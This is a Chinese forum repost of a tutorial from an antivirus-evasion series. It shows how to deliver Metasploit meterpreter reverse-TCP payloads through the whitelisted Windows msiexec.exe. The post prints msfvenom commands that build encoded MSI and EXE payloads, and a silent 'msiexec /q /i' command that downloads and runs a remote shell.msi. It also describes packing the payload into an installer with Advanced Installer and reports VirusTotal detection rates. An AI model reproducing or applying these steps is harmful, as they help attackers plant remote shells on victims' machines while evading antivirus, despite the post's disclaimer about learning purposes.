设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 shellcode免杀 远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀 ...
返回列表 发新帖
查看: 2695|回复: 0

远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60)

[复制链接]
Angelica

9

主题

55

帖子

290

积分

中级会员

Rank: 3Rank: 3

积分
290
发表于 2020-3-7 22:40:27 | 显示全部楼层 |阅读模式
本帖最后由 Angelica 于 2020-3-8 14:15 编辑

本文转载自:Tide安全团队
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

免杀能力一览表








几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

一、msiexec.exe介绍

看到msiexec可能还有点陌生,但说道.msi可能就比较熟悉了,在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎,而MSI软件包使用该引擎来安装应用程序,解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。
之前在介绍免杀工具的时候有些工具就可以生成msi格式的payload,比如专题6介绍的venom:https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ,其实msfvenom也可以生成msi格式的payload,不过被杀软查杀的比较厉害了。
msi文件可以双击执行,也可以命令行静默执行,而且msiexec也同样支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行:
  1. msiexec /q /i http://www.tidesec.com/shell/shell.msi
复制代码

二、msf自生成msi(VT查杀率27/60)

我先用msfvenom生成一个原生态的msi文件看一下

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b '\x00' -f msi -o test.msi
复制代码

在测试机器上执行,可以双击进行安装,也可以使用命令行静默执行。

  1. msiexec /q /i test.msi
复制代码

不出意料,静态和动态查杀都没过。


virustotal.com上查杀率27/60个,还算不错呢。


四、使用Advanced Installer(VT免杀率29/59)

Advanced Installer是一款功能强大、可生成符合MS Windows认证的Windows Installer的MSI 安装包制作工具,具有友好的图形用户界面,直观而且非常简单的界面,是一款很好的 Windows Installer 编写工具。
绿色版下载http://www.pc6.com/softview/SoftView_13165.html
先用msf生成一个exe格式的apyload

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b '\x00' -f exe -o shell.exe
复制代码

打开Advanced Installer,创建一个项目


在项目中选择自定义操作,然后附加shell文件


选择构建,开始生成msi文件。



静默执行msiexec /q /i "Your Application.msi"
无法过360和火绒。


virustotal.com上Your Application.msi查杀率为29/58,略惨,还不如msf直接生成的。


virustotal.com上shell.exe查杀率为54/70,也就是说利用Advanced Installer打包后有15个杀软不会报病毒了,这点来看还算可以的。


虽然查杀率有些高,但这种思路还是不错的,这种工具网上有很多,可以找一些小众的试一下。
五、参考资料

使用msiexec.exe绕过应用程序白名单(多种方法):https://www.cnblogs.com/backlion/p/10493910.html
渗透测试中的msiexec:https://3gstudent.github.io/3gst ... AD%E7%9A%84msiexec/

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 10:51 , Processed in 0.013260 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表